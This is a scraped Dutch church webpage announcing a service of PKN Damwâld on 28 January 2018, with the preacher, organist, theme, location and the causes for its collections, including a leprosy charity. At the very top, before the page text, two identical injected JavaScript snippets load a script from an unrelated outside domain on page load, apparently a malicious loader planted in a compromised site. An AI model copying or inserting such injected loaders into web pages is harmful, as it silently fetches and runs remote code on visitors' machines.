;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 28 januari 2018 9:30 uur - PKN Damwâld
zondag 28 januari 2018
09:30 uur

Kerkdienst zondag 28 januari 2018 9:30 uur

Thema: Kerk- School- Gezinsdienst

Informatie

Voorganger:Mw. G. van der Zwaag, Broeksterwâld
Organist:Nienke van der Heide-Visser
Thema:Kerk- School- Gezinsdienst
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Leprastichting

"Onrein, onrein!" Je zou het over jezelf moeten roepen! Een waarschuwing zodat anderen uit de buurt blijven. In de Bijbel lezen we dat leprapatiënten (melaatsen) werden gemeden en uitgesloten. Helaas is dat vandaag de dag vaak niet anders. Ieder jaar vragen we daarom op Wereld Lepra Zondag ( de laatste zondag van januari) aandacht voor mensen die lijden aan de gevolgen van Lepra. Met uw steun krijgen zij de zorg en liefde die ze zo hard nodig hebben. Want gelukkig zijn er artsen en verpleegkundigen die in onze lepraziekenhuizen zich in navolging van Jezus liefdevol inzetten voor leprapatiënten. Jezus had de melaatsen lief en raakte hen aan. Zo krijgen patiënten in onze ziekenhuizen ook aandacht, liefde en een arm om zich heen.
4 februari Kerk: Rwanda - Gezondheidszorg voor armen (Project 10 27)
Een klein ziekenhuis in Gyangugu kan door een paar investeringen de zorgkwaliteit enorm verbeteren (o.a. laboratorium). Verder is een steunfonds nodig waardoor medische zorg voor de allerarmsten mogelijk wordt

Tweede collecte: Kerk
Uitganscollecte: Jeugdraad